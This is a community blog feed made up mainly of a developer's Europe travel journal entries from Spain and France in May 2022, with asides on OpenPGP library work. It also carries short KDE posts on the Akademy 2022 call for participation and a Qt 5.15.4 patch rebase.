Free Software, Free Society!
Thoughts of the FSFE Community (English)

Tuesday, 24 May 2022

Europe Trip Journal – Entry 22: Drowsy and Annoyed

Today was a rather slow day. I got up at 8:20 to get breakfast at the hostel. This time they had bread \o/. I was the only one eating there, everybody else (there was a group of elderly people staying at the place too) must have gotten theirs already. At some point C. came down to get her breakfast too. She however decided to eat in the garden.

After I finished my meal, I went back to my room to lay down on the bed for an hour or so, before it was time to pack my bag. After checkout at 11:00, I said farewell to C. and headed to the metro station. Half way there I noticed that I forgot my leftover beer bottles at the hostels fridge, but I decided not to go back. May someone else enjoy a drink on my behalf 🙂

I had 3:30h left before I would take the train, so how to best kill spend that time? In the metro station I studied the network map and decided that I wanted to check out the port near the city center, which I had not visited yet.

When I walked up the stairs at the port station (I forgot the name unfortunately), immediately the smell of fish got into my nose. Et voila, directly next to the metro entrance was a big stand displaying dead fish.

More interesting than the fish I found a pharmacy sign at the other side of the bay. Having no highspeed internet left on my phone (come on, they say they throttle the connection down to lower speeds, but in reality they suffocate the phones connectivity! I would not mind not being able to watch videos while not on WiFi, but at least text-only pages should still work! Right now, not even translator pages would load without timing out. Someone needs to sue! Rant over) I was unable to search for the French word for coughing, so I just winged it and asked the pharmacist if she would be able to speak English. Luckily she was, so I was able to get some medicine. Hopefully my coughs are gone until the end of the week.

With this out of the way, I wandered around without a plan for some time and eventually decided to go to the local Burger King in hope for some WiFi. At this point I was annoyed at the waiting time and just wished that time was running faster. After finishing a vegan whopper and an ice tea it was still about 2h left, but I had enough of the port area so I took the metro to the station nonetheless.

When I entered the station, my hand searched for my ticket but I could not find it. I searched my other pocket but no trace of the ticket. Damn. Annoyed I was about to by another ticket when I saw one laying on the access control gates. Was that mine? I took it and placed it on the sensor and sure enough, the gate opened. Kind French people 🙂

My wait at the train station was unspectacular and just as annoying. I sat down on a bench and listened to music. I was really tired so I almost fell asleep again and again. Time still seemed to crawl so it was like an eternity until finally the schedule display showed the platform on which my train was waiting. The train ride was the same deal. I just wanted to get to Lyon and so I listened to music and tried not to fall asleep.

In Lyon I took the metro. I had to switch 2 times, the third time being just for one more station. The last metro train was waiting at a station that was quite aggressively tilted. So far even, that between the tracks there was a toothed rack, so apparently this was a cog railway! I’ve never taken one. A few minutes after, the train departed and rolled into the deep black of the tunnel. After a rather steep decent it eventually transitioned into the horizontal. Then it felt like the train was aggressively accelerating as I was pushed to the back. However, there was no engine howl or anything, the sound of the engine stayed the same. Finally I realized that the train was on a super steep ascent. And then it stopped at the station. After getting off the train, I had to take a picture of the station:

Note, that the camera is held perfectly horizontally

The hostel was just a few meters away, so finally I could check-in and get some more rest in my bed. What an annoying day.

In the evening I did some work in the community area of the hostel. There is a new revision of the Stateless OpenPGP Protocol specification which adds support for password-protected keys. I got to work implementing these changes in sop-java, which is the generic interface library used by pgpainless-cli and pgpeasy.

Another guest sat down next to me with a jute bag displaying a “there is no cloud” logo. He pulled out a Thinkpad covered in stickers just like mine. I noted that these were some nice stickers and we got to talk for a short while. He asked me if I was attending MixIT, an IT conference which was apparently happening in Lyon just now. I denied and he told me the conference was held exclusively in French anyways. Still, would have been nice to combine my stay here with a visit at a hacker conference 😀

Now its time for me to go to bed. Hopefully the medicine I got will work and I wont keep everybody in my room awake.

Monday, 23 May 2022

Akademy 2022 Call for Participation is open

The Call for Participation for Akademy is officially opened!

...and closes relatively shortly! Sunday the 12th of June 2022

You can find more information and summit your talk abstract here: https://akademy.kde.org/2022/cfp

If you have any questions or would like to speak to the organizers, please contact akademy-team@kde.org

Europe Trip Journal – Entry 21: Ferris Wheels and Train Tickets

This morning I got up at 8:00 which is an hour earlier than during the rest of the trip – and lets not talk about my usual sleep schedule. The reason was that breakfast was served from 7:00 to 9:00 in the hostel. J. and me arrived at 8:15 or so and to my disappointment there was no bread left. As a replacement they served Zwieback onto which I applied a thick layer of jam. After the breakfast it was time to say farewell to J. as he had to catch his train.

My plans for the day were comprised of going to the beach. That’s it. I had located a strip of sand on OpenStreetMaps earlier and used a water fountain as wayoint for Organic Maps. The app suggested taking the metro, so I walked out of the hostel in the direction of the station. On the way I crossed a park with fitness devices. How nice is that? People here can go for a run and have free access to public sports devices!

The metro station was massive. I turned a corner, expecting the usual stairs down into a rabbit hole where you need to mind your head to prevent injury, but no. This station was a whole another deal. Four long stairs lead down to what looked like a bunker entrance, several tens of meters under floor level. Across from the stairs I was taking was another set of stair leading up again, and also some escalators.

Again, the image doesn’t do justice to the massive scales of the station

Down in the station there was another set of stair that finally lead down to the platform. I found it fascinating that the metro in Marseille has rubber tires! I guess that is so it can provide those high acceleration values?

I had to switch metro once to get to my destination and from there I had to walk for about 20 minutes to reach the beach. The spot I had chosen was a gravel beach, but the individual pebbles were all rounded down smooth and actually felt nice to walk and sit on. I relaxed a bit after which it was time to check out the water.

It was cold.

After only 2 minutes or so I had enough of swimming and went back onto the beach to lay down and re-heat using the power of the sun. a few hours later I grabbed my stuff and walked down the beach as I had seen a Ferris Wheel in the distance.

The guy in the ticket booth was asleep and it took me several attempts to wake him up. Finally a spirited “Bonjour?” through the small opening in the plexiglass woke him up so I could buy my ticket. The view was not as spectacular as for example the ride with the cable car in Barcelona, but I could get a good overview nonetheless.

After 2 revolutions of the Ferris Wheel I decided to get back to the hostel, so I had to walk all the way back to the metro station and take the same route back. After yesterdays miserable attempt at buying groceries on a Sunday, today I had another try. I found a shop which unfortunately was very overpriced, but I still got some beers, yogurts, chips and a chocolate bar.

Then it was time for dinner, followed by an hour of work. I added some tests to my pull request against Bouncy Castle which I had reported on in an earlier post, and then spontaneously decided to attend a OpenPGP meeting which will take place at the end of the week in Geneva. For that reason I had to cancel my plans to go to Italy next and instead book train tickets and hostels for a slightly different route. I guess I will visit Italy another time :). Oh boy, Geneva is expensive!

And now I am sitting here, alone in the dining hall, writing this post. This is the only place in the hostel with the tri-factor of okay-ish WiFi coverage, a wall plug and comfortable seating. Unfortunately my coughs are back and they are super annoying. Thanks to C. for lending me her mug so I can sip some tea which hopefully helps a bit. I hadn’t managed to get to a pharmacy today, but I will try again tomorrow.

Europe Trip Journal – Entry 19 – 20: Tranquility

My second day in Nimes was unspectacular. After getting up eventually, I went into the city to get some breakfast. I settled on a salad in a restaurant close to the Arena. When I finished the salad, I wandered around in the city.

You could visit the Arena, however I was a bit confused by mixed messages. Some places stated that entry was free, but the sign at the entrance prompted to buy a ticket for 10€. There were also guided tours for a higher price, so in the end I decided not to visit the Arena from the inside. Part of my reasoning was also that the place was undergoing some maintenance currently, so not all parts could be visited.

A few streets further, I reached a big temple. Unfortunately it was closed right now, so I could only take some pictures from the outside.

It was pretty hot with the sun standing high up in the sky, so soon I took refuge in a supermarket. Here I bought some sweets, a liter of milk as well as a bottle of blue Fanta which I had never tried before. I also wanted to get some breakfast for the next day, so I decided to get some cereals. However I would not want to take the opened pack of cereals with me later, so instead I was glad to find a “cereal station” where I could fill my desired small amount of cereals into a paper bag.

Back at the hostel I was exhausted. It was only around 14:00 or so, maybe earlier, but I was already drenched in sweat. I decided to lay in bed to wait until the bulk of the heat was gone. In the end I ended up laying there for 4 hours or so, so it was early evening when I was ready to go for another walk.

I had eaten too many of the sweets I had bought earlier, so I had a sugar-induced headache. It was time for a real meal to dilute the sugar concentration down. I stopped at a restaurant next to the one where I had gotten the Camembert Fodue the day before and ordered a vegetarian burger. It came with fries, a small salad and I also got a local beer of Nimes with it. Nice.

Finally I went to bed after a day that felt a bit wasted, but hey, I’m on vacation!

The next morning I got up and went down to the kitchen to get some cereals for breakfast. When I later left the hostel, I forgot to take the half liter of leftover milk with me, so in case you are staying in the hostel near the train station in Nimes, feel free to take my Milk (its labeled “Paul” ;)).

My train had 15 minutes of delay, so I had to wait a bit at the train station. The ride was uneventful and quick (only about an hour). Arriving in Marseille, as usual my first destination was the hostel. This time the place I had booked was the farthest away from the station as it had ever before. I had to walk about 5km through the heat of noon. I rarely met any locals, I guess those were clever enough to avoid the heat.

Marseille is mountainous and my hostel was located at the top of a hill. After 1 and a half hours I finally reached the place, however they would only open in about another hour from now. I found a bench which I sat down on and relaxed a bit. From the outside the hostel looked a bit like a haunted mansion. I couldn’t make out any signs of life. Did I book at a closed place by mistake?

Will I ever escape this haunted house?

Eventually some people appeared on the premise, so I got up and after searching the entry for a while (I had to ring for them to open a gate), I went to the reception. The inside of the building was not what I had expected. It looked like a big mansion, with an atrium (I’m not sure if that’s how its called) and lots of intricate decorations and a mosaic floor.

Quo Vadis!

What a fascinating place. Outside was a big garden with some tables and a very nice view over the city. I heard that they also offered sleeping in tents.

Earlier that day I had noticed that I was running out of clean clothes, so it was time for laundry day again. I asked in the reception, if it was possible to do the laundry here and they said that there was a machine in the garden. I must have made a confused face, as the receptionist quickly followed with “I will show you”. She guided me to a small shed in the garden where there were two washing machines. I put my stuff into one of them and then asked where to dry the clothes afterwards, to which she replied that there were clotheslines behind the shed.

In my room I met J., a traveler from the US. We exchanged some few words, but he seamed a bit tired, so I decided not to bother him too much.

As I was a bit hungry, I decided to buy some groceries next. Some chips and some yogurts would be nice, along with two or three bananas. On OpenStreetMaps I located a Carrefour some 1.5km away and so I grabbed a small bag and started walking. It was only when I stood before closed doors that I remembered it was Sunday. On the way back I saw a sign for a pizza place, so I wasn’t out of options.

Back at the hostel my laundry was soon finished so I got it out of the machine and went behind the shed where there was a small maze of clotheslines. One was free so I put my stuff on a little plastic table and started hanging my stuff. Usually I dislike doing the laundry, as I deem it to be a very mundane, tedious task, but today it was different.

The sun was slowly starting to set and was sending its warm, friendly beams my way. Birds were singing and the tall grass was ticking my legs. A pleasant warm summer breeze was carrying the distant, muffled sounds of the city which was slowing down after the day. It was a summer evening in France. Suddenly all the exciting and all the wrong that was going on in the world faded into the background. For a short moment priorities shifted and the world seemed to center around me and my laundry. It was a perfectly peaceful moment of tranquility and I enjoyed it.

Later I decided to get a pizza from the place I had seen earlier. I got a tomato-mozzarella pizza with olives. The place had no tables as it was primarily focusing on delivery services, but luckily I was able to order in situ. After only 10 minutes or so my pizza was ready and I walked back to the hostel.

In the garden I met C., a woman who turned out to be from Germany as well. Since everyone at the hostel was about to get dinner, I decided to join C. and J-L., a French guy with a Star-Trek’y first name, at their table. C. explained that she wanted to move to Marseille at some point and that she was currently looking for potential places. Soon J. also joined us. C. noted that J. and I would look like brothers and we soon found out that there were some staggering similarities between us. Like me, J. was traveling for 3 weeks already and he also wanted to go further south-east next until ending his journey at the end of the month. He was also studying computer science like I did and was also currently making a living as a software developer, although he was doing front-end web development.

We spent the evening talking about all sorts of stuff in a vivid mix of French, English and German and it was so nice to forget that we were from different countries and just be people. J. had learned French solely through an app, which is quite impressive given how fluid he was able to communicate. Although I had learned French for 3 years in school I had forgotten most of it, so I had some trouble following the French parts. It steadily improved though as I remembered more and more of the vocabulary.

Then it was time to go to bed. I wasn’t feeling febrile anymore and my sore throat had mostly stopped to hurt, but now in the evenings I had the strong urge to cough. Since I didn’t want to wake up my room mates I tried to suppress it, but a super uncomfortable itch was making it hard for me to breath without coughing. It was so bad that it was shaking my whole body sporadically. In order to not wake up the others I spent some time on the toilet until eventually I was able to fall asleep in my bed without any more coughs. I’m not sure if this is a regular cold or what it is, but I will ask for some medicine in a local pharmacy today.

Saturday, 21 May 2022

Europe Trip Journal – Entry 18: Change of Plans

During the night, another guest of the hostel in Barcelona decided that at 3:00 it would be the perfect time to wash his laundry in the rooms sink. Otherwise the night was okay, so at 9:00 I got up and got a nice, rich breakfast consisting of cereals, a croissant, a yogurt and a banana. Plus 2 cappuccinos for good measure.

My plan for today was to go to the train station to get a reservation for the train to Montpelier which would go later the day. However, when I arrived at the station and got to the ticket office after waiting half an hour in the queue, the ticket seller told me that the train was booked out. However, they offered me to try some smaller, regional trains. Those would go earlier, but I would to switch multiple times. On the bright side though, I also would not need to buy reservations. So after waiting at the station for another hour, I boarded the train to Cerbère.

This was a regional train, meaning it would make regular stops at small stations and its top speed was quite a bit lower than what I had gotten used to during my trip. Once again I was able to observe the landscape slowly changing. The orange-ish soil progressively vanished under greenery and the mountains got steeper. When the train reached Port-Bou, one station before terminus, I was in awe admiring the blue of the sea on my right while green mountainsides were close to my left.

This place would have been nice for a day or so too!

In Cerbère I was greeted by police who wanted to control passengers passports at the platform. This was the first time I was getting checked by authorities. They basically just glimpsed over my identification, while some other travelers apparently weren’t quite as lucky. I can only speculate, but based on the gestures of the police men, I assume they were lacking some required document. Police took them with them, presumably to verify their identities at the police station.

It was already past 16:00 and I was hungry. Unfortunately the two snack machines at the station were both broken. Finally the train to Avignon arrived, so maybe I was lucky at another station? Some stations later, I made a risky move and quickly left the train, ran to the snack machine at the platform, got a pack of gummies and ran back. It worked out and nobody stole my stuff 😀

I still had to book a hostel in Montpelier. When I checked the offers, I was shocked to see that 50+€ per night were the minimum. Even the youth hostels were expensive. So I looked for alternatives and finally decided not to switch trains in Narbonne, but instead stay on the train for a bit longer to leave at Nimes. Here I found a hostel at an affordable price.

Nimes Train Station

The train station in Nimes was built using large archways. When I got off the train, I thought I had to somehow move over the tracks in order to get into the city. Instead the signs lead me down some stairs into what I thought was the cellar. However, the large arches eventually opened up to the street. Now I realized that the tracks were leading into the station on the first floor (European way of counting). Interesting.

I quickly checked into the hostel and then asked the receptionist for a recommendation for a place to get something to eat. He recommended me a street with lots of restaurants. It wasn’t far away, so it only was a five minutes walk. Originally I had some trusty pizza in mind, but then I thought I need to try something local. One offer made me curious: Camembert Fondue!

Mmmmmmmh 🙂

The meal was fantastic. Tagliatelle with molten Camembert on top, combined with a salad, some bread and a coke. It was so nice! If you come to Nimes some day, check out P’tit Nimois 😉

Satisfied I wandered around through Nimes for a bit longer, but it was already getting dark. I took some nice pictures of the Arena though and afterwards went to the Hostel to end the day.

While I don’t know what I’d miss out on in Montpelier, I’m liking what I have seen from Nimes so far, so it was not too bad of a deal 🙂

By the way, if as a law-abiding citizen, getting checked by police makes you uncomfortable (I know it does for me), you should really act out against the European Commisions latest plans to deploy wide-reaching “Chat Control“. The proposal is dangerous and would deploy a surveillance system in the EU which is even worse than those in repressive states like China or Russia! There is are a bunch of petitions against the proposed rules, and you can even provide direct negative feedback to the EU!

Thursday, 19 May 2022

Europe Trip Journal – Entry 17: Separation of Concerns

The night was awful. While the hostel I stayed at in Madrid was super cheap, my room mates where hell. There was a group of 6 or more travelers from some Spanish speaking country abroad. Another room mate told me they were jet-lagged and that he was expecting them to keep us all awake for a long time. He wasn’t wrong.

First, those people were on their phones doing face time calls with their relatives – in bed and without head phones – until like 2am. Any reasonable person would go to the community area for that! Then at some point they stopped the phone calls, but kept talking to each other while it was already way past resting time. And it was not like it wasn’t apparent that people tried to sleep and were annoyed of them. When they finally stopped talking they kept playing games on their phones (with sound obviously). And -of course – when they finally fell asleep they soon started snoring.

At 6am or so one of their alarms went of for 20 minutes while they did not wake up from it. Finally I had enough so I stood up and started poking the owner of the alarm to wake him up. It took quite a bit of effort and they took some time to realize that I was pointing at their smartphone.

While I was already making up plans for revenge – like start a phone call at 9am in the morning just to pay them back in their own coin, surely they were planning to sleep until at least 11:00 – they got up at 8:30 and started loud conversations with another. Another Spanish speaking guest luckily stopped them and asked them – rather aggressively – to keep it quiet and let others sleep. I wasn’t surprised if that guest learned Spanish over night just for the whole purpose of telling them to shut up in the morning.

Later I went to the train station and got my reservation for the train to Barcelona. I was so tired that I fell asleep multiple times during the ride, but unfortunately the seat was really uncomfortable, so the whole trip felt awfully elongated.

Finally in Barcelona I checked into my hostel and then went out to meet with M. She had extended her stay in Barcelona for a few days, so we were able to meet up a second time after my last stay in the city. We wandered around for some time, looking for a place to get some breakfast. We settled for an espresso and some bocadillos at a small café. Later another friend of M. called I’. joined us (I’m using scientific notation here, because I. and I’. are actually different people).

We wandered a bit further and eventually ended up outside a bar where we ordered 3 beers. To our delight, we also got a glass full of what apparently was un-popped, but fried corn. It tasted like popcorn, but was actually crunchy – but not hard – corn.

Soon our conversation went into that slightly weird category of questions would ask people you had just met, but that were perhaps a bit too intimate for closer friends. You know, questions that benefit from a certain degree of anonymity and distance. We talked about past relationships and whether we could see ourselves getting married or having kids.

At some point I got asked whether my past relationship had been monogamous. Out of affect I said yes, but really this is only half the truth. While I was only meeting my partner, she was meeting someone else too. I was aware of this, as we had discussed it openly and I was okay with that. At least rationally. The fact that today I wasn’t answering the question of whether my relationship was monogamous truthfully tells me that part of me potentially hadn’t been, or at least wasn’t fully okay with it.

I haven’t really talked publicly about this to anyone. Maybe I was having superstitions that people would see me as unmanly. Maybe I didn’t want to make personal relations with “unflexible” relatives more complicated.

After we had finished our beer and were running out of topics to talk about, it was time to get back to our hostels. Since we were all staying in separate places it was once again time for me to say farewell to M. for a second and last time. And so we parted ways and I was left with my thoughts.

In software design there is the concept of separation of concerns. Responsibilities of a program would be separated into different modules and each module would have a well-defined interface. If one module of a program needs to interact with another module to get it to perform a certain task, it doesn’t really need to care about how the other module does it. It doesn’t need to learn about the techniques that the other module applies or of its philosophy. What’s important is that the job gets done. The fact that modules do not get an insight into the inner workings and most importantly the inner state of other modules is called information hiding.

I think in my personal life I’m subconsciously following the principle of information hiding to quite some extent. I’m uncomfortable when in a super market a friend would loudly state that “that’s the tooth paste you don’t like, isn’t it?”, thereby potentially revealing this information to others. Even if this piece of knowledge is harmless and mundane, I don’t like it getting leaked uncontrollably.

I recently read about a study whose findings were that people tend to swear more easily if it wasn’t in their mother’s tongue. Their rationale was that people associate less emotions with the translations of swear words as they would do with those in their native language. I guess for the same reason it’s easier for me to write about all this in English than it would be in my native language.

The chatter today was a casual conversation with quasi strangers where I could present myself as who I really am, uncorrupted by considerations for other peoples feelings and expectations. Still, realizing that I wasn’t able to be true to myself over my past relationship made me contemplate. Maybe this is somewhat of a coming-out. A confession while it shouldn’t be.

Wednesday, 18 May 2022

Europe Trip Journal 16: Panthers and Ceiling-Milk

The past night was bad. Feeling “a bit sick” turned into feeling really sick. My head felt hot and my throat started aching. My lungs also felt strange. Earlier the day I had gotten a red warning on my phone informing me of a risky encounter during the pub crawl in Barcelona. Soon I was 90% convinced I had contracted Covid.

Getting the virus while on the trip would suck big time. Where would I quarantine? Would I need to get a hotel room for my own for a week? Or would I be allowed to travel back home? All those thoughts kept me awake for long past midnight.

I’m not afraid of catching Covid for my own sake. I’m young, I am healthy and most importantly I am fully vaccinated and already had the virus half a year or so ago. I trust in modern medicine and surely I would get over it. Don’t get me wrong, I don’t take the virus too lightly either. Some people I know got it and they had to fight it for a long time. So I consider myself lucky for having had mild symptoms when I got it.

Getting Covid would primarily suck because I would endanger others. If I would be allowed to stay in hostels, I would endanger my room mates. I would have endangered people I had met the past days, people who would have trusted me to have payed more attention.

On the other hand, in Barcelona I had been the only person to wear a mask for about a third of the time, until I obeyed the peer-pressure and put the mask away. So at least I had tried at some point. Sure, this would not acquit me of being guilty for my own behavior in any way, but I also don’t feel like I owe anyone an apology just yet.

Later the night I found out that in Spain quarantine rules had been mostly lifted, so in case I would contract the virus, I was not strictly required to self-isolate if I had only mild symptoms. The reason for this lift being that most of the population in Spain had been fully vaccinated already. Reading this calmed me down a bit. Looks like I wouldn’t be stuck in a hotel room and the risk I would impose on others would also be of limited severity.

In the morning, after getting some breakfast and checking out of the hostel I went to a nearby pharmacy and bought some auto tests. In a park I sat down on a bench and tested myself for the virus.

Negative. *phew* I will test again later, but for now I am positive (hah!) it was maybe some phantom symptoms combined with a sun stroke.

Now it’s time to get a ticket for the next stop of my journey. I’m going back to Madrid for the next night, so I bought a reservation for the train at the North station. The ticket seller told me, that the train would not go from this station, so I had to take a shuttle bus to the Joaquin Sorolla station a few hundred meters away.

Did I mention that I like terminal stations? I’m only used to through-stations, so it’s a strange feeling to see the trains head-on right in front of you. There they are, like sleeping dragons waiting to to be woken up and worm their way out from the platform. Jan Böhmermann recently said that in some sense train stations are like the cathedrals of progress, built in honor for the majestic mechanical beings which are the engines that inhabit them.

Terminal train station with resting trains.

At a McDonald’s in the station I got an alibi coke in order to be able to charge my laptop. The outlet in my last hostel was broken, so the battery was only filled up half way. Unacceptable!

The train ride was productive. I got some utility methods implemented in PGPainless and then turned my focus to some issues in Bouncy Castle. When parsing certificates (OpenPGP public keys), BC will fail hard as soon as it encounters a subkey of an unknown version. While this is very predictable behavior and predictability is always a good thing, it means that as soon as the OpenPGP standard introduces some new algorithm (e.g. post quantum cryptography – PQC), BC will fail to process public keys which make use of these algorithms in its sub-keys. That’s not very good in terms of upwards compatibility. A user might want to have a key with both conventional and PQC subkeys for some time in order to transitition to the latter. I proposed a PR upstream containing a set of changes which enable BC to simply skip unknown subkeys when parsing certificates.

And then I already arrived at Madrid. Again, I did not get to see the hall with the tropical trees as arriving passengers were routed differently. This time my hostel was in the west of the city, some 2km from the train station. When I left the train station I immediately noticed that it was warmer here than it had been in Valencia. The sun was burning more merciless to some degree(s) (hah!).

My hostel was super cheap, and offered a unique experience I had never had before. I had booked online without any human interaction. When I stood in front of the door, there was a bell, which I rang expecting to be let in. However, a telephone rang and at some point a woman answered. I could barely understand her, but she told me I had to use the kiosk to get in. A little confused I was looking for a shop keeper, but there was none. Then I finally understood that the woman was referring me to the vending machine which stood across the entrance door.

This was my first time checking into an hostel without any kind of human interaction (apart from the accidental phone call). The vending machine turned out to be an automaton for checking into the hostel. First I was asked for my name and for the date of departure. Then I was prompted to place my passport on some kind of scanner. Some OCR tool detected the serial number of my passport (which I had to correct), and then I was prompted to place my face in front of a webcam. Afterwards the machine printed a receipt and spat out my key card for accessing the building.

The key card allowed me to enter the front door, as well as my room. Further, I figured out it also opened my locker, which revealed a set of linen for my bed, as well as a towel. Nice.

I unpacked some stuff and then went to take a quick shower after which I went into the city. Rather quickly I recognized landmarks from my last visit a few days ago. My current hostel was located withing a kilometer of my last, just quite a bit lower (did I mention Madrid was 3-dimensional?).

The sun was burning so merciless that after some hours I had to return to the hostel once again. Later the day I planned to visit a place that was recommended to me by I. A pub which was a cave in which they would serve milk that comes from the ceiling. Yeah, I know.

Walking to the place did not took long. Before entering though I had to get something to eat first. I stopped at a restaurant and sat down at one of the tables outside. And then I did what confusingly the job title of the person serving me was. I waited (hah!).

After some 15 minutes or so I could finally persuade the waiter to get my order by aggressively waving at him. I ordered an Ensalada Griega (greek salad). The meal was nice, although I felt a bit odd as they gave me 2 sets of cutlery.

After waiting another 15 minutes for the waiter to take my payment, I finally went into the restaurant to pay at the counter. And then it was finally time for the long anticipated cave-ceiling-milk!

El Chapandaz as the place was called was looking interesting. They gave the place the appearance of a cave, with stalactites everywhere. Sure, it was that cheap kind of fake rock that you might know from amusement park attractions, but still the place had a certain vibe.

El Chapandaz

I was disappointed though from the main attraction of the place. The leche de pantera (panthers milk) was served by pouring half a liter of milk from one of the stalactites into a 1L glass which was first filled with what felt like 3 tablespoons of cinnamon. Then they added some mysterious alcoholic fluids and topped everything off with a bunch of ice cubes.

Unfortunately the result was not made for my taste buds at all. I barely manged to get 3/4 of it down, but then I had to leave the rest standing. I was a bit resigned by the outcome of the evening, but at least today I left on my mask whenever possible. Since I still don’t feel 100% okay, I soon after left and walked back to the hostel.

Tomorrow I will get up early to reserve a seat for the train to Barcelona. There I will probably meet with M. again, who is returning home that day. Then my path will likely lead me in direction of Italy somehow. We will see.

Tuesday, 17 May 2022

Europe Trip Journal – Entry 13-15: Valencia

I haven’t been posting for a while, simply because I wasn’t feeling like it. I’m writing this blog mainly for myself, to later remember what happened, what places I visited and what people I met along the way.

So here is another update.

On the 15th I enjoyed Madrid on my own. I went to the park I had reported on before and tried to work a bit on my laptop. Because I couldn’t find my jute bag which I normally use to take stuff like water bottles, my picnic blanket and other stuff with me while leaving the big backpack at the hostel, I only took my laptop with me, meaning I was relying on the availability of park benches and chairs in the park. Sitting on the grass was nice for shorter periods, but even though the grass cushions to a certain degree, longer work sessions would quickly become uncomfortable.

I sat at the table of a small takeaway for a bit and eagerly typed away while some Spanish family was celebrating a child’s birthday the next table. Unfortunately there was no shade, so after some time it got tedious and so I decided to go back to the hostel where I stayed for the rest of the day.

The next morning (it was Monday now) I got up early, had a breakfast and then went to the train station to buy a seat reservation for the next train. For some reason I made a small mistake and registered the train at 17:40 in my app though, so my reservation got booked on that date as well. When I noticed, I went back and asked if I can swap the reservation for the train at 11:40. I was relieved when it worked out, so I did not have to wait for 6 additional hours.

When I arrived at Madrid I must have been routed through another part of the train station than when I got the ticket today. I could not remember the booking hall, which in case of the Madrid Atoche train station is filled with tropical trees.

The train route was nice and I did not get any work done whatsoever. Instead I was mostly looking out the window, watching the Spanish hills fly by. And then I arrived in Valencia. I had once again, judging by the map, underestimated the size of the city so my walk to the hostel I had booked took some time, but so I got to know parts of the city.

I came across parts of what looked like the historic core of the city. Yellow stone buildings with delegate decor elements met some Assassins-Creed-esque cathedrals and open plazas with polished marble floors.

I quickly brought my stuff to my room and then packed my picnic blanket into a packing cube I normally use for clothes. Swiftly I switched my underwear for bathing trunks and then went in direction of the beach.

Again I misjudged the distance, but also the heat of the sun that barely had crossed the zenith, so I was quickly drenched in sweat. On my way I crossed what on the map had looked like a river, but it turned out to be an elongated park with bridges built over it.

So many palm trees!

After the park was a broad street with parking lots in the middle strip, something I also had never seen before.

Tell me again the world doesn’t have a problem with individual transportation

So after roughly an hour of walking and sweating I arrived at the beach. Compared to the other beaches I had been so far, this one was massive. Along the coast it went on for at least one or two kilometers (I can’t be bothered to check), and it was constantly roughly 100 meters or so thick, so there was enough place to find a spot in comfortable distance to others.

It is surprisingly hard to take photos of the beach which are suitable for distribution in this blog, since many visitors of the beach chose to go topless and I want to preserve individuals right to privacy. For that reason enjoy a boring image taken from far far away.

Only after I had unpacked my collection of items I had brought with me did I notice that I neither had packed a towel, nor sunscreen to replenish after bathing. So I decided that sunbathing would need to suffice that day, but made the commitment to swim in the ocean the next day.

When I went back to the hostel later, I wanted to take the metro, but I only had taken with me a 20€ billet which the ticket machine was refusing to accept. So I had to walk back. That concludes Mondays events.

On the next morning (at the time of writing it was barely still today), I took some quick breakfast and then prepared to return to the beach. This time I brought both sunscreen and a towel in addition to some coins for metro tickets, plus the usual equipment (picnic blanket, water bottle). My phone and purse on the other hand I had left at the hostel today. Should some thief decide to rob me today, he wouldn’t be in luck. The most valuable item I had on me was the key to the hostel locker, which I planned to take with me into the water.

So after a quick metro ride and some few minutes of walking I was back at the beach. Today it was even hotter than the day before, so when I got rid of my shoes to walk through the sand bare feet, I almost regretted that decision. After setting up my base close to the shore, I decided to first get some more sun to let my towel (which was still a bit moist from a shower I had the day before) dry. Then it was time to get buoyant (hah!).

The water was not cold at all. It wasn’t exactly warm either, but instead had exactly the right temperature. It was perfect.

After my swim I re-sprayed with sunscreen and then got some more sun. Later I decided not to risk a sunburn (you know how hard it is to apply sunscreen to your own back without support or a mirror?) and to go back to the hostel. After a quick refresh in the shower I did get about an hour of work done and then noticed that I was hungry.

In the historic core of the city I found nice looking restaurant and – to my disappointment – got the most expensive frozen pizza of my life. I mean, I did not ask afterwards, but I studied computer science, trust me, I know my frozen pizza. Cannot recommend that place ðŸ™�

Later today I wanted to meet with some folks from the hostel for some beers, but I do feel a bit sick, so I opted out and instead decided to have a chill evening in bed.

Sunday, 15 May 2022

Europe Trip Journal – Entry 12: Positive Vibes and Negative Results

Yesterday was a slower day. I stayed in bed until 13:00 or so and recovered some well needed sleep. After that I went out to get some breakfast. At a place called Black Panther I got a really nice burger/sandwich made from a buttery smooth croissant topped with salad, tomatoes, mayonnaise, mozzarella and green pesto. As a drink I got a cold brew latte. This was super tasty!

Afterwards I decided that it was time for some practical mathematics, so I performed a random walk through the city ;P Madrid is surprisingly three dimensional. While there are large flat areas, just behind the next wall there could be slope downwards into a valley. I even stumbled across a large arched bridge.

A few minutes later I walked down a street that could just as well be located in New York. Its crazy how diverse the city is. At a large roundabout was an entrance to a park. Here people were relaxing in the sun, playing tennis or volleball and right in the middle of the park was a water basin on which there were many rowboats.

Right beneath the large statue in the back, there was a saxophonist playing modern pop music hits. What had surprised me on my tour so far was how many street musicians were faking their performance. Previously I had seen a man playing the violin, while the instrument coming out from his loudspeaker was definitely a cello. There had been guitarists which whose finger movements didn’t match up the music they were playing and so on. But this saxophonist was real and it sounded really nice.

Only a few hours later I was back at the hostel. Supposedly there was a community area in the basement, so I took the stairs down. At a wall I discovered a poster informing about a pub crawl. Since I really had enjoyed the one in Barcelona and since I hadn’t yet get to know any people I figured it’d be a good idea to join. It was still some time until the evening, so I went to the local supermarket to get a snack.

I also stopped at the pharmacy to buy a Covid test. I had felt a bit sick lately, so I took the test just to make sure. It would suck big time to get sick during the trip. Contrary to Germany, where there are heavily advertised test centers everywhere, I hadn’t seen any such facilities in France or Spain at all yet. On the internet I had read that you could do tests in private laboratories, but for foreigners they would charge around 100€ for that. You could also get a prescribed test payed for by health insurance after consulting a doctor, but that seemed like too much of a hassle to me, so the better option was an auto test. Luckily it was negative, so I was relieved and there was nothing standing in the way of the pub crawl.

At 21:30 the organizers arrived and invited everyone to a game of beer pong. Later we went to the first bar, which was actually another hostel. There I met some nice people. There was J., a friendly guy from Denmark, G., a huge dude from Paris, as well as two Canadian siblings A. and M. It was really nice meeting those people and I had some great conversations.

They say that Madrid is the city with the longest nights, but we only made it to some time after 3:00. After the tour, we got some fast food and then we parted ways. Unfortunately we haven’t exchanged contact information, so its unlikely to meet the folks again. Well, there will be another pub crawl another time for sure 🙂

Saturday, 14 May 2022

The KDE Qt5 Patch Collection has been rebased on top of Qt 5.15.4

Commit: https://invent.kde.org/qt/qt/qt5/-/commit/5c85338da3c272587c0ec804c7565db57729fd48

 

Commercial release announcement: https://www.qt.io/blog/commercial-lts-qt-5.15.4-released 


OpenSource release announcement: https://lists.qt-project.org/pipermail/development/2022-May/042437.html

 

I want to personally extend my gratitude to the Commercial users of Qt for beta testing Qt 5.15.4 for the rest of us.

 

